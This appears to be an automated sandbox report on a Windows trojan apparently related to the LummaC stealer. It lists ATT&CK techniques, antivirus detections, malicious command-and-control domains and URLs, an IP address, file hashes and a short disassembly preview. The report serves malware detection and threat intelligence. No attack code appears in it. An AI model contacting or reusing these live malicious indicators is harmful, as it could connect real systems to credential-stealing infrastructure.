                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                fer4JIJGeL.exe58%ReversingLabsWin32.Trojan.Symmi
                fer4JIJGeL.exe100%AviraTR/Crypt.XPACK.Gen
                fer4JIJGeL.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/ku100%Avira URL Cloudmalware
                https://mindhandru.buzz/4100%Avira URL Cloudmalware
                https://mindhandru.buzz/~Z100%Avira URL Cloudmalware
                https://mindhandru.buzz/pil100%Avira URL Cloudmalware
                https://mindhandru.buzz/apisZV100%Avira URL Cloudmalware
                https://mindhandru.buzz/Win100%Avira URL Cloudmalware
                https://mindhandru.buzz/apill100%Avira URL Cloudmalware
                http://crl.micro80%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                		172.67.165.185
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    		high
                    rebuildeso.buzzfalse
                      		high
                      appliacnesot.buzzfalse
                        		high
                        screwamusresz.buzzfalse
                          		high
                          cashfuzysao.buzzfalse
                            		high
                            inherineau.buzzfalse
                              		high
                              prisonyfork.buzzfalse
                                		high
                                hummskitnj.buzzfalse
                                  		high
                                  mindhandru.buzzfalse
                                    		high
                                    https://mindhandru.buzz/apifalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabfer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://mindhandru.buzz/kufer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510562445.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510838458.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1512013029.0000000005FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://mindhandru.buzz/4fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://mindhandru.buzz/fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488788404.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.0000000001812000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488770291.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488938097.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.000000000180B000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488678588.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ocsp.rootca1.amazontrust.com0:fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://mindhandru.buzz/Winfer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYifer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://mindhandru.buzz/pifer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mindhandru.buzz/dfer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.c.lencr.org/0fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.i.lencr.org/0fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?fer4JIJGeL.exe, 00000000.00000003.1511113401.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://mindhandru.buzz/~Zfer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctafer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://support.mozilla.org/products/firefoxgro.allfer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.micro8fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538148540.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608248734.000000000187E000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.0000000001871000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://mindhandru.buzz/apillfer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://mindhandru.buzz/pilfer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://mindhandru.buzz/apisZVfer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          172.67.165.185
                                                                                          		mindhandru.buzzUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1581241
                                                                                          Start date and time:2024-12-27 08:59:18 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 4m 26s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:5
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:fer4JIJGeL.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:0d3b04489baa22c2f702c549466b64f4.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 0
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Stop behavior analysis, all processes terminated

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target fer4JIJGeL.exe, PID 7656 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: fer4JIJGeL.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          03:00:15API Interceptor8x Sleep call for process: fer4JIJGeL.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.165.185cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                            ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                  oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                      U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                                        ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                          P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                            r06aMlvVyM.exeGet hashmaliciousLummaCBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              mindhandru.buzzcFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSwJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 104.21.11.101
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.11.101
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 172.67.165.185
                                                                                                              ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              No created / dropped files found

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.949528536269432
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:fer4JIJGeL.exe
                                                                                                              File size:1'854'976 bytes
                                                                                                              MD5:0d3b04489baa22c2f702c549466b64f4
                                                                                                              SHA1:9f7abb36d9fffd4d6cb236c8e119359517691729
                                                                                                              SHA256:0da0539837800ea38bae7556cd5ffe4d45fb0d1135253e85801645bc7fa6cfec
                                                                                                              SHA512:e99e2d0950471bd1be9ad38a6b3111878bb5ab53f9c42d2b5bef9aa9add57ebc5e6d684e2598d18a346593571cbee9f75b2fa5aa5f5a5cebe925a43e7ace9a5a
                                                                                                              SSDEEP:24576:fn5nkVcg0iwDKpJvb5Qn6nN/LYrUUulLex+qZgLAYOxTdF0SCpwZMrS61wRBUih:fnAsDwJj5ZNjFU+NqZgMDxgSCpZ4BUE
                                                                                                              TLSH:588533A21501F1C8C4EDB23717BB07F579B47266C7EB49E005121B60AAFE623793DAB1
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................@I...........@..........................pI...........@.................................Y@..m..

                                                                                                              File Icon

                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x894000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp 00007F9F1090EB5Ah
                                                                                                              cvttps2pi mm3, qword ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007F9F10910B55h
                                                                                                              add byte ptr [0000000Ah], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [esi], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add eax, 0000000Ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [esi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax+eax*4], cl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add eax, 0000000Ah
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [0000000Ah], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
